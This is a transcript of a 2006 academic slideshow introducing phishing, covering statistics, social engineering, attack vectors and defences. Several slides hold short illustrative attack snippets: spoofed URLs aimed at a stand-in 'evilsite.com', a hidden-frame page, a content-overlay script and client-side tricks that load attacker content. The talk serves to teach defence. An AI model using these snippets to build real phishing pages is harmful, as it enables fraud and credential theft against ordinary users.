Download
talk iii introduction to phishing n.
Skip this Video
Loading SlideShow in 5 Seconds..
Talk (III): Introduction to Phishing PowerPoint Presentation
Download Presentation
Talk (III): Introduction to Phishing

Talk (III): Introduction to Phishing

227 Views Download Presentation
Download Presentation

Talk (III): Introduction to Phishing

- - - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

  1. Talk (III): Introduction to Phishing Jenq-Haur Wang Academia Sinica Nov. 16-17, 2006

  2. Outline • Introduction • Phishing Techniques • Anti-Phishing Attempts Phishing

  3. Introduction • “Phishing” • To “fish” for passwords and financial data from the sea of Internet users • First mentioned on Usenet newsgroup in 1996 • Identity theft • Online fraud Phishing

  4. Why Phishing? • E-commerce sites • Shopping, bidding, … • E-banking (network banking) • Credit card, stock, insurance, … • Low cost • Ex. In Taiwan, [source: http://news.chinatimes.com/Chinatimes/newslist/newslist-content/0,3546,110507+112006111700256,00.html] • Chinatrust Bank: 1 million (20%), 56% • Cathay United Bank: 0.7 million, 50% • Taishin Bank: 0.6 million (1/3) Phishing

  5. References • Wikipedia – Phishing • http://en.wikipedia.org/wiki/Phishing • Anti-Phishing Working Group (APWG) • http://www.antiphishing.org/ • Paper: “The Phishing Guide: Understanding and Preventing Phishing Attacks,” by Gunter Ollmann, available at: http://www.technicalinfo.net/papers/Phishing.html Phishing

  6. Phishing Activity Trend Phishing

  7. Phishing Activity Trend Phishing

  8. Phishing

  9. Top Used Ports Hosting Phishing Data Collection Servers Phishing

  10. Phishing

  11. Most Targeted Industry Sectors Phishing

  12. Phishing

  13. A Closer Look • The most targeted industry sector for phishing attacks: • financial services 73% -> 92.6% • Country hosting the most phishing sites: • US 29% -> 27.88% • [Source: APWG Phishing Activity Trends Report, Oct. 2004 & Aug. 2006] Phishing

  14. Project: Crimeware • Phishing-based Trojans – Keyloggers • Code which is designed with the intent of collecting information on the end-user in order to steal those users’ credentials • Targeted at financial sites, e-commerce sites, or webmail sites • Phishing-based Trojans – Redirectors • Code which is designed with the intent of redirecting end-users network traffic to a location where it was not intended to go to • Spyware Phishing

  15. Phishing

  16. Phishing

  17. Phishing

  18. Damage Caused by Phishing • Identity theft • Loss of personal information • Credit card number, social security number, … • Create fake accounts in a victim’s name, ruin a victim’s credit, prevent victims from accessing their own accounts, … • Financial loss • 1.2 million users in the US, $929 million USD • US businesses lose $2 billion USD per year • In UK web banking frauds, £12.2m in 2004, £23.2m in 2005 • 1/20 users claim to have lost due to phishing in 2005 Phishing

  19. Phishing Message Delivery • Email and spam • Web-based delivery • Instant messaging • Trojaned hosts Phishing

  20. Example – Delivered by E-mail Phishing

  21. Example –Web-based Delivery Phishing

  22. Phishing Examples • PayPal • SouthTrust Bank Phishing

  23. PayPal Phishing

  24. SouthTrust Bank Phishing

  25. Phishing Techniques • Social engineering • Automated attack system Phishing

  26. Some Common Tricks • Misspelled URLs or the use of subdomains • http://www.mybank.com.example.com/ • Making the anchor text for a link appear to be a valid URL when the link actually goes to the phishers' site • http://www.google.com@members.tripod.com/ • Using JavaScript commands in order to alter the address bar • Using a bank or service's own scripts against the victim (cross-site scripting) Phishing

  27. Social Engineering Techniques • Pretexting • The act of creating and using an invented scenario (the pretext) to persuade a target to release information or perform an action and is usually done over the telephone • Phishing • Emails appearing to come from a legitimate business — a bank, or credit card company — requesting "verification" of information and warning of some dire consequence if it is not done Phishing

  28. Social Engineering Techniques • Trojan Horse/Gimmes • Gimmes can arrive as an email attachment promising anything from a cool or sexy screen saver, an important anti-virus or system upgrade, or even the latest dirt on an employee • Quid pro Quo • Latin for “Something for something” • An attacker calls random numbers at a company claiming to be calling back from technical support. Eventually they will hit someone with a legitimate problem, grateful that someone is calling back to help them. The attacker will "help" solve the problem and in the process have the user type commands that give the attacker access and/or launch malware Phishing

  29. Automated Attack Systems • APWG suggested that conventional phishing techniques could become obsolete in the future as people are increasingly aware of the social engineering techniques used by phishers • They propose that pharming and other uses of malware will become more common tools for stealing information Phishing

  30. Phishing Attack Vectors • Man-in-the-middle attacks • URL obfuscation attacks • Cross-site scripting attacks • Preset session attacks • Hidden attacks • Observing customer data • Client-side vulnerability exploitation Phishing

  31. Man-in-the-Middle Attack Phishing

  32. URL Obfuscation • Bad domain names • http://www.mybánk.com/ • Friendly login URLs • http://mybank.com:ebank@evilsite.com/login.htm • Third-party shortened URLs • http://tinyurl.com/xxxxxx • Hostname obfuscation • http://mybank.com:ebank@210.134.161.35/login.htm • URL obfuscation • Escape encoding (%20), Unicode encoding (%uFD3F), … Phishing

  33. Cross-Site Scripting Phishing

  34. Cross-site Scripting (CSS or XSS) • Using custom URL or code injection into a valid web-based application URL or imbedded data field • The result of poor web-application development processes Phishing

  35. Preset Session Attack Phishing

  36. Preset Session Attack • Both HTTP and HTTPS are stateless protocols • The most common way of managing state within applications is through Session Identifiers (SessionID’s) • Cookies, hidden fields or fields contained within page URLs • The phishing message contains a web link to the real application server, but also contains a predefined SessionID field • The attackers system constantly polls the application server for a restricted page using the preset SessionID Phishing

  37. Hidden Attacks • Hidden frames • Overriding page content • Graphical substitution Phishing

  38. Hidden Frames • <frameset rows="100%,*" framespacing="0"><frame name="real" src="http://mybank.com/" scrolling="auto"><frame name="hiddenContent" src="http://evilsite.com/bad.htm" scrolling="auto"></frameset> Phishing

  39. Overriding Page Content • var d = document; d.write('<DIV id="fake" style="position:absolute; left:200; top:200; z-index:2"><TABLE width=500 height=1000 cellspacing=0 cellpadding=14><TR>'); d.write('<TD colspan=2 bgcolor=#FFFFFF valign=top height=125>');...... Phishing

  40. Graphical Substitution Phishing

  41. Observing Customer Data • Keylogging • Screen grabbing Phishing

  42. Client-side Vulnerability Exploitation • MS Internet Explorer mishandling • location.href=unescape('http://www.mybank.com%01@evilsite.com/phishing/fakepage.htm'); • RealPlayer • <OBJECT ID="RealOneActiveXObject" WIDTH=0 HEIGHT=0 CLASSID="CLSID:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5"></OBJECT> // Play a clip and show new status displayfunction clipPlay() {window.parent.external.PlayClip("rtsp://evilsite.com/hackme.rm", "Title=Glorious Day|Artist name=Me Alone")} Phishing

  43. Anti-Phishing Attempts • Legislation • User training • Technical measures Phishing

  44. Legal Actions • On Jan. 26, 2004, the FTC (Federal Trade Commission) filed the first lawsuit against a suspected phisher • Fake AOL webpage • In US, Anti-Phishing Act of 2005 (S.472) • A five-year prison sentence and/or fine for individuals who commit identity theft using falsified corporate websites or e-mails. Phishing

  45. User Training • Contacting the company that is the subject of the email to check that the email is legitimate • Typing in a trusted web address for the company's website into the address bar of their browser • Nearly all legitimate email messages from companies to their customers will contain an item of information that is not readily available to phishers • PayPal, addresses their customers by username • Banks, partial account number • Not always reliable Phishing

  46. Anti-Phishing Software • Acting as a toolbar that displays the real domain name for the visited website • Microsoft IE7 • Mozilla Firefox 2 • Opera 9.1 • Netscape 8.1 • Google Safe Browsing for Firefox • NetCraft toolbar • eBay toolbar • Earthlink ScamBlocker • GeoTrust TrustWatch Phishing

  47. Technical Measures • Client-side • Server-side • Enterprise-level Phishing

  48. 1. Client-Side • Desktop protection agents • Email sophistication • Browser capabilities • Digitally signed email • Customer vigilance Phishing

  49. Desktop Protecting Agents • Anti-virus • Personal firewall • Personal anti-spam • Spyware detection Phishing

  50. Functionalities Needed • Ability to detect and block attempts to install malicious software • Ability to identify spam delivery techniques • Ability to update the latest anti-virus and anti-spam signatures • Ability to detect unauthorized connections • Ability to block outbound delivery of sensitive information to suspected malicious parties Phishing